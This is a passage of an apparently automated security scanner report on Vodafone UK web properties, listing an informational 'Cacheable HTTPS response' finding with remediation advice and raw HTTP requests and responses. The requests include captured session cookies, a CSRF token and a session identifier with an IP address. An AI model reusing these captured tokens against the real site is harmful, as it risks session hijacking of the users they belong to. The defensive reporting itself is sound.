Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 1382
Content-Type: application/octet-stream
Last-Modified: Tue, 06 May 2008 09:26:19 GMT
Accept-Ranges: bytes
ETag: "802f933d5bafc81:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:20 GMT

// insertAdjacentHTML(), insertAdjacentText() and insertAdjacentElement()
// for Netscape 6/Mozilla by Thor Larholm me@jscript.dk
// Usage: include this code segment at the beginning of your document
// before any other Javascript contents.

if(typeof HTMLElement!="undefined" && !
HTMLElement.prototype.insertAdjacentEleme
...[SNIP]...

11. Cacheable HTTPS response previous next
There are 54 instances of this issue:

https://freesim.vodafone.co.uk/favicon.ico
https://freesim.vodafone.co.uk/orders/add
https://freesim.vodafone.co.uk/packages/index
https://help.vodafone.co.uk/system/selfservice.controller
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/articleappearance.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/browseTopic.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/commonVariables.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/1columnBorder.gif
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/1columnFooter.gif
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/bnr_business_customers.jpg
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/buttons/arrow-grassGreen.gif
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/dottedLine.gif
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/img_forum.jpg
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/img_store_finder.jpg
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_button_joindiscussions.png
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_headerAlpha_home.png
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_headline_browsetopics.png
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_headline_meettheteam.png
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_or-fs8.png
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_search-form-input.png
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_sectionTeta_phoneTeaser.jpg
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_shelfs_li_line.gif
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/bg_topic_shelf.gif
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/bullet_arrow_grey-on-white.png
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/input_left_med.png
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/sprite_arrow-buttons-alpha-fs8.png
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/redesign/images/sprite_button_med.png
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/jcarousellite.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/jquery.ba-hashchange.min.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/main.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery-1.4.2.min.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.ba-resize.min.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.easing.1.3.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.scrollTo-1.4.2-min.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.selectbox.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.formValidation.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.config.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.guide.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.homecarousel.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.helpCenter.searchPage.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.ui.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/swfobject.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/liveperson/mtagconfig.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/misclinks.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/mozInsertAdjacent.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/searchinpututil.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/searchresultsappearance.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/sidelinks.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/templateutils.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/usefulitemsutil.js
https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/validateBooleanExpression.js
https://help.vodafone.co.uk/system/web/widget/platform/util/util.js

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

11.1. https://freesim.vodafone.co.uk/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://freesim.vodafone.co.uk
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: freesim.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: mbox=check#true#1321393464|session#1321393311388-20138#1321395264|PC#1321393311388-20138.19#1322603004; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20dl%3D1%7C1321644251677%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20s_invisit%3Dtrue%7C1321644252364%3B%20gpv_p32%3Dtro%253ATroubleshooting%2520-%2520Help%2520-%2520Vodafone%7C1321644252455%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20access_channel%3DOther%2520Websites%3B%20s_sq%3D%3B%20s_sv_sid%3D532231605974%3B%20s_ppv%3D65%3B; ci_csrf_token=dd84c0b9cbdc9fee5188ae42ba617736; ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%224bbae6314fafd19c2f713147a2aac21f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2250.23.123.106%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1321641758%3B%7D5868556a3f86da8aea60b3078a3ac3e5

Response

HTTP/1.1 200 OK
Date: Fri, 18 Nov 2011 18:56:21 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 24 Aug 2011 08:18:27 GMT
ETag: "2e8044-e36-4ab3bf4e65ac0"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h...&... ..............(....... ...........@...........................BQ..............94......{u......),..ZY...}.......................(..........Z]..ca......JE......................cu
...[SNIP]...

11.2. https://freesim.vodafone.co.uk/orders/add previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://freesim.vodafone.co.uk
Path:	/orders/add

Request

GET /orders/add HTTP/1.1
Host: freesim.vodafone.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.3. https://freesim.vodafone.co.uk/packages/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://freesim.vodafone.co.uk
Path:	/packages/index

Request

Response

11.4. https://help.vodafone.co.uk/system/selfservice.controller previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/selfservice.controller

Request

Response

11.5. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/articleappearance.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/articleappearance.js

Request

GET /system/web/view/selfservice/templates/vodafone/articleappearance.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 7457
Content-Type: application/octet-stream
Last-Modified: Mon, 23 Aug 2010 17:31:03 GMT
Accept-Ranges: bytes
ETag: "53dbc5f5e842cb1:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:20 GMT

/*
This file contains the support functions for the articleappearance
template.
*/
var childWindows = new Array(100);
var noOfChildren = 0;

window.onbeforeunload = function()
{
/*Unloa
...[SNIP]...

11.6. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/browseTopic.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/browseTopic.js

Request

GET /system/web/view/selfservice/templates/vodafone/browseTopic.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 2142
Content-Type: application/octet-stream
Last-Modified: Tue, 06 May 2008 09:26:19 GMT
Accept-Ranges: bytes
ETag: "802f933d5bafc81:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:20 GMT

function clickTopic(topicId, topicType, startingId, topicName, parentTopicId, parentTopicType, sourceForm, topicHrchy)
{
// TODO: what if browse form is not present??
if(typeof document.BROWSE
...[SNIP]...

11.7. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/commonVariables.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/commonVariables.js

Request

GET /system/web/view/selfservice/templates/vodafone/commonVariables.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 260
Content-Type: application/octet-stream
Last-Modified: Tue, 06 May 2008 09:26:19 GMT
Accept-Ranges: bytes
ETag: "802f933d5bafc81:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:23 GMT

var currentTopicId = 0;
var currentTopicType = 0;

function initializeCommonTopicRelatedVariables(curTopicId, curTopicType)
{
currentTopicId = curTopicId;
currentTopicType = curTopicType;

...[SNIP]...

11.8. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/1columnBorder.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/img/1columnBorder.gif

Request

GET /system/web/view/selfservice/templates/vodafone/img/1columnBorder.gif HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/web/css/selfservice/templates/vodafone/main.css
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 77
Content-Type: application/octet-stream
Last-Modified: Wed, 24 Oct 2007 13:15:42 GMT
Accept-Ranges: bytes
ETag: "01369fa3f16c81:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:24 GMT

GIF89a...............................!.......,............C..0.I..8.....1. .;

11.9. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/1columnFooter.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/img/1columnFooter.gif

Request

GET /system/web/view/selfservice/templates/vodafone/img/1columnFooter.gif HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/web/css/selfservice/templates/vodafone/main.css
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 338
Content-Type: application/octet-stream
Last-Modified: Wed, 24 Oct 2007 13:15:42 GMT
Accept-Ranges: bytes
ETag: "01369fa3f16c81:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:24 GMT

GIF89a.......................................................................................................,............p(...h..l..p,.tm...(.....dB.....r.l:...tJ.Z.. ..0.......H...z.n....|N.......@.
...[SNIP]...

11.10. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/bnr_business_customers.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/img/bnr_business_customers.jpg

Request

GET /system/web/view/selfservice/templates/vodafone/img/bnr_business_customers.jpg HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 18283
Content-Type: application/octet-stream
Last-Modified: Thu, 14 Aug 2008 09:38:53 GMT
Accept-Ranges: bytes
ETag: "80744d90f1fdc81:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:23 GMT

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
. .

.....
...........................

...............................................................:..
...[SNIP]...

11.11. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/buttons/arrow-grassGreen.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/img/buttons/arrow-grassGreen.gif

Request

GET /system/web/view/selfservice/templates/vodafone/img/buttons/arrow-grassGreen.gif HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/web/css/selfservice/templates/vodafone/main.css
Cookie: mbox=PC#1321393311388-20138.19#1322852253|check#true#1321642713|session#1321642623709-428964#1321644513; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644454844%3B%20s_invisit%3Dtrue%7C1321644455289%3B%20gpv_p32%3Donl%253AVodafone%2520Search%7C1321644455326%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; s_sess=%20access_channel%3DOther%2520Websites%3B%20s_sv_sid%3D532231605974%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_cmrun%3D1%3B%20ev1%3D3g%2520internet%2520paygo%3B%20s_scount%3D1%3B%20s_stack%3D1%253A3g%2520internet%2520paygo%3B%20s_sq%3D%3B%20s_ppv%3D97%3B; eGain_eService_JSESSIONID=bJgMTGqG2pfn1VBNLwdhTyjn55nQchkVvVfhQwnvXjgvvPmtd38n!39658889; BIGipServerpool_ems00820ss=1442842890.20480.0000; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 651
Content-Type: application/octet-stream
Last-Modified: Wed, 24 Oct 2007 13:15:42 GMT
Accept-Ranges: bytes
ETag: "01369fa3f16c81:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 18:58:24 GMT

GIF89a..}..#.................................................l.....p.....BiQd.x~..AhO;aEW.ek.xo.{q.}u..t..w..y..x.......................................................................................
...[SNIP]...

11.12. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/img/dottedLine.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/img/dottedLine.gif

Request

